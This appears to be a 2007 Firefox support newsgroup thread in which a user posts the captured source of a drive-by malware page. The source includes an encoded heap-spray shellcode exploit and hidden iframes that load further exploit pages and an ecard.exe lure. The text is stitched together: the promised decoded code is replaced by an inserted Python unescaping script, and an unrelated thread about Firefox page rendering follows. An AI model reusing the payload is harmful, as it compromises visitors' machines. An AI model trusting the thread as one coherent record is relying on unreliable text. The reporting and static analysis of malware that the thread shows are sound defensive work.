I am unable to reproduce this strange event again, but it definitely
happened so I wonder if someone can take a look at it.
Andrés
-------------------------------------------------------------------------
Hello, I've accidentally entered a malware site by following an e-mail link
to www.duhymn.hk (be careful NOT to enter that site with a browser).
When I entered the site with Firefox 2.0.0.4, the browser immediately froze,
so I had to manually terminate it with the Task Manager (Windows XP).
Then I thought that it could be a malware site, so I tried to download
its main page outside any browser to avoid executing it again.
I got the following code from the "index.htm" page:
___
<html>
<body>
<script>
document.write(unescape("%3c%73%63%72%69%70%74%3e%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25
%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65
%25%75%30%30%34%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38
%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30%30%30%37%25%75%30%30%30%30%25%75%37%32
%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25%75%30
%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75
%31%33%65%38%25%75%30%30%30%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25
%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36%66%35%34%25%75%36%39%34%36
%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30
%30%25%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30
%36%61%25%75%30%30%36%61%25%75%30%39%65%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35
%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36%61%35%31%25%75
%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25
%75%65%38%30%30%25%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63
%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30%30%25%75%30%30%62%65%25%75%30%30%30
%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62%31
%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36
%32%36%39%25%75%36%31%37%32%25%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75
%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34%35%25%75%37%34%36%39%25
%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38
%25%75%37%30%37%34%25%75%32%66%33%61%25%75%37%32%32%66%25%75%37%34%36%36%25%75%37%35%36
%38%25%75%32%65%36%34%25%75%36%66%36%33%25%75%32%66%36%64%25%75%36%31%36%64%25%75%32%65
%36%65%25%75%37%38%36%35%25%75%30%30%36%35%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30
%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%36%30%30%30%25%75
%38%62%36%34%25%75%33%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25
%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25%75%30%38%35%62%25%75%64%61%38%39
%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33
%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30
%37%33%25%75%37%62%38%62%25%75%30%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30
%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25%75%31%33%31%65%25%75
%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25
%75%35%39%35%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62
%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63%31%30%37%25%75%30%32%65%30%25%75%37%33%38
%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25%75%38%35
%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32
%64%62%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75
%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37%32%35%30%25%75%36%33%36%66%25
%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30
%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%30%64%30%64%25%75%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65
%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73%75%62%73%74%72%69
%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20
%41%72%72%61%79%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69
%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69%6c%28%30%78%64%30%64%30%64%30%64%29%3b
%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73
%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d
%42%31%43%33%2d%30%44%45%37%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e
%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74%73%5b%30%5d%2e%63%72%65%61
%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63
%68%28%65%29%7b%7d%0a%3c%2f%73%63%72%69%70%74%3e"));
</script>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d
%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61
%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a
%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d
%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%73%74%79
%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29
%7d%20%3c%2f%73%74%79%6c%65%3e%0a"));
</script>
We are currently testing a new browser feature. If you are not able to
view this ecard, please <a href="/ecard.exe">click here</a> to view in
its original format.
</body>
</html>
___
The fact that the code is obfuscated like this hints that it's a malware
site. After "unescaping" both encoded lines, I got the following code:
___
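The static "unescaping" step described in the post above, as an added example that is not part of the original post: it peels `unescape("...")` layers by text substitution only, so nothing from the page is ever executed, and flags a few markers of the kind visible in the posted source. The function names, the indicator list and the sample input are assumptions made for this illustration; the sample is constructed and harmless, not the posted payload.

```python
import re

# All names here are illustrative; this is not code from the post or from Mozilla.
ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
ONLY_U = re.compile(r"(?:%u[0-9a-fA-F]{4})+")
INDICATORS = {
    "nested unescape": re.compile(r"unescape\s*\("),
    "1x1 iframe": re.compile(r"<iframe[^>]*\bwidth=[\"']?1\b[^>]*\bheight=[\"']?1\b", re.I),
    "object classid": re.compile(r"<object[^>]*\bclassid=", re.I),
}

def js_unescape(s):
    """Decode %XX and %uXXXX the way JavaScript unescape() does; nothing is executed."""
    return ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def peel(source, max_depth=4):
    """Return (depth, kind, text, flags) for every unescape("...") literal, outermost first."""
    out, queue = [], [(source, 1)]
    while queue:
        text, depth = queue.pop(0)
        for m in CALL.finditer(text):
            literal = re.sub(r"\s+", "", m.group(2))  # undo mail line-wrapping
            if ONLY_U.fullmatch(literal):
                # Pure %uXXXX literal: packed 16-bit values, not markup. Report size only.
                out.append((depth, "binary", "%d 16-bit units" % (len(literal) // 6), []))
                continue
            decoded = js_unescape(literal)
            flags = [n for n, rx in INDICATORS.items() if rx.search(decoded)]
            out.append((depth, "text", decoded, flags))
            if depth < max_depth:
                queue.append((decoded, depth + 1))
    return out

def _enc(s):  # used only to build the constructed sample below
    return "".join("%%%02x" % ord(c) for c in s)

# Constructed sample with the same two-script shape as the posted page.
SAMPLE = (
    '<script>document.write(unescape("' + _enc('<script>x=unescape("%u4141%u4141");</script>') + '"));</script>\n'
    '<script>document.write(unescape("' + _enc('<iframe src="a.htm" width="1" height="1"></iframe>') + '"));</script>\n'
)

if __name__ == "__main__":
    for depth, kind, text, flags in peel(SAMPLE):
        print(depth, kind, repr(text), flags)
```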
Newsgroups: mozilla.support.firefox
NNTP-Posting-Date: Mon, 25 Jun 2007 04:39:06 +0000 (UTC)
I'm running FF2 on Ubuntu and I've been struggling with a problem for a
while:
Randomly, pages will load (i.e. at the level of http) but the content
will not display. So for example I may be at one page, click a link,
see the progress bar indicate that all the data has been transferred,
but nothing happens.
It just sits there. By resizing my window the display WILL CHANGE
correctly, but only by doing that.
Please tell me someone has had this prob. This is such a pain in the
ass. I love this browser but it's killing me -- just killing me -- to
have to resize sometimes every flipping page load... *cries*...
*sobs*...
--lstewart
Either an extension is causing this -
"https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
or it's the theme you are using, which is misbehaving -
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.
Thanks for your reply, but add-ons are certainly not the cause.